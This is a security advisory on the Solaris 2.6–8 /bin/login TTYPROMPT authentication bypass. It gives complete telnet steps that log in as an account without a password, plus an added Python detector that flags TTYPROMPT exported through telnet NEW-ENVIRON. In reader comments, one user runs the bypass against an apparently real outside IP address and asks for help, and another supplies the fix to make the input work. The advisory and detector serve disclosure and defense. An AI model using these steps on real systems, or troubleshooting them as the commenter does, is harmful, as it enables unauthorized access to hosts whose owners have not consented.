Summary:
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT and the sending of a long username. The vulnerability allows an attacker to gain elevated privileges on a remote Solaris system.

Credit:
The information has been provided by Jonathan S.
Vulnerable systems:
* Solaris version 2.6, 7, and 8
This vulnerability is very simple to exploit, since it does not require the attacker to compile any code. All it requires is that the attacker define the environment variable TTYPROMPT as a 6-character string from within telnet. Jonathan believes this overflows an integer inside login that records whether the user has been authenticated (just a guess).
Once connected to the remote host, you type the username, followed by 64 " c"s and a literal "\n". You are then logged in as that user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
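The TTYPROMPT value in the session above does not travel in the login line itself; the telnet client exports it to the server through the NEW-ENVIRON option (RFC 1572) before login ever runs, which is also where a defender can see it. The following is an added, defender-side example and not code from the advisory or its reporters: it decodes the NEW-ENVIRON subnegotiations in the client-to-server bytes of a telnet session and reports any TTYPROMPT variable the client pushed, since an ordinary client has no reason to export that name. The byte streams at the bottom are constructed samples, not captured traffic; the assumption that a BSD-style telnet client sends a user-defined name as USERVAR rather than VAR is mine.

```python
"""Report a telnet client that exports TTYPROMPT via NEW-ENVIRON (RFC 1572).

Added example, not code from the original advisory. Parses the client-to-server
byte stream of a telnet session, decodes IAC SB NEW-ENVIRON IS ... IAC SE
subnegotiations and flags TTYPROMPT. Sample streams below are constructed.
"""

IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39                       # RFC 1572 option code
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2   # subnegotiation verbs
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3  # payload field markers


def extract_subnegotiations(stream: bytes):
    """Yield (option, payload) for each complete IAC SB <opt> ... IAC SE.
    Doubled IAC bytes inside the payload are unescaped to a single 0xFF."""
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd != SB:
            # WILL/WONT/DO/DONT (251-254) carry an option byte; others do not
            i += 3 if 251 <= cmd <= 254 else 2
            continue
        if i + 2 >= n:
            break
        option, payload, j, closed = stream[i + 2], bytearray(), i + 3, False
        while j < n:
            b = stream[j]
            if b == IAC:
                if j + 1 < n and stream[j + 1] == IAC:
                    payload.append(IAC)
                    j += 2
                    continue
                if j + 1 < n and stream[j + 1] == SE:
                    closed, j = True, j + 2
                break                  # unterminated: rescan from this IAC
            payload.append(b)
            j += 1
        if closed:
            yield option, bytes(payload)
        i = j


def parse_environ_payload(payload: bytes):
    """Decode an IS/INFO payload into (kind, name, value) tuples.
    kind is 'VAR' or 'USERVAR'; value is None when no VALUE was sent.
    SEND payloads (the server asking the client) decode to an empty list."""
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return []
    entries, current, buf, i = [], None, None, 1
    while i < len(payload):
        b = payload[i]
        if b == ESC and i + 1 < len(payload):     # next byte is a literal
            if buf is not None:
                buf.append(payload[i + 1])
            i += 2
            continue
        if b in (VAR, USERVAR):
            if current is not None:
                entries.append(current)
            current = ['VAR' if b == VAR else 'USERVAR', bytearray(), None]
            buf = current[1]
        elif b == VALUE and current is not None:
            current[2] = bytearray()
            buf = current[2]
        elif buf is not None:
            buf.append(b)
        i += 1
    if current is not None:
        entries.append(current)
    return [(k, nm.decode('latin-1'), None if v is None else v.decode('latin-1'))
            for k, nm, v in entries]


def client_environment(stream: bytes):
    """All environment variables the client exported over NEW-ENVIRON."""
    env = []
    for option, payload in extract_subnegotiations(stream):
        if option == NEW_ENVIRON:
            env.extend(parse_environ_payload(payload))
    return env


def find_ttyprompt(stream: bytes):
    """One finding per TTYPROMPT the client exported; the advisory's session
    uses a 6-character value, so that case is marked explicitly."""
    return [{'kind': k, 'value': v, 'six_chars': v is not None and len(v) == 6}
            for k, name, v in client_environment(stream)
            if name.upper() == 'TTYPROMPT']


def _env_escape(data: bytes) -> bytes:
    out = bytearray()
    for b in data:
        if b == IAC:
            out += bytes([IAC, IAC])
        elif b in (VAR, VALUE, ESC, USERVAR):
            out += bytes([ESC, b])
        else:
            out.append(b)
    return bytes(out)


def build_environ_is(pairs) -> bytes:
    """Construct the IS reply a client sends for (kind, name, value) triples;
    used here only to build the constructed sample streams."""
    out = bytearray([IAC, SB, NEW_ENVIRON, ENV_IS])
    for kind, name, value in pairs:
        out.append(VAR if kind == 'VAR' else USERVAR)
        out += _env_escape(name)
        if value is not None:
            out.append(VALUE)
            out += _env_escape(value)
    return bytes(out + bytes([IAC, SE]))


# Constructed samples. The first mirrors the advisory's session: the client
# offers NEW-ENVIRON (IAC WILL 39), exports TTYPROMPT=abcdef, then types the
# username line. A second variable carries an escaped 0x01 to exercise ESC.
EXPLOIT_STREAM = (bytes([IAC, 251, NEW_ENVIRON])
                  + build_environ_is([('USERVAR', b'TTYPROMPT', b'abcdef'),
                                      ('USERVAR', b'ODD', bytes([1]) + b'A')])
                  + b'bin' + b' c' * 64 + b'\r\n')
BENIGN_STREAM = (bytes([IAC, 251, NEW_ENVIRON])
                 + build_environ_is([('VAR', b'DISPLAY', b'host:0'),
                                     ('VAR', b'USER', b'bin')])
                 + b'bin\r\n')

if __name__ == '__main__':
    for label, s in (('exploit-like', EXPLOIT_STREAM), ('benign', BENIGN_STREAM)):
        print(label, client_environment(s), find_ttyprompt(s))
```

Run against real traffic, `find_ttyprompt` would be fed the reassembled client-to-server half of a TCP/23 session. Only the environment exchange is inspected; the username line is left alone because the variable is the precondition the advisory describes, and it appears in the negotiation before any prompt is shown.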

Subject: Mihai
Date: 3 Jul. 2006
From: dragomirescu200yahoo.co.uk
# t
t> environ define TTYPROMPT abcdef
t> o 61.166.33.152
Trying 61.166.33.152...
Connected to 61.166.33.152.
Escape character is '^]'.
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Password:
It doesn't work. Please help me

Subject: Correction
Date: 29 Aug. 2007
From: Anonyhelper
Remove the newline/CR that is in the middle of your line of 64 "c"s. It should be one unbroken line terminated by the literal \n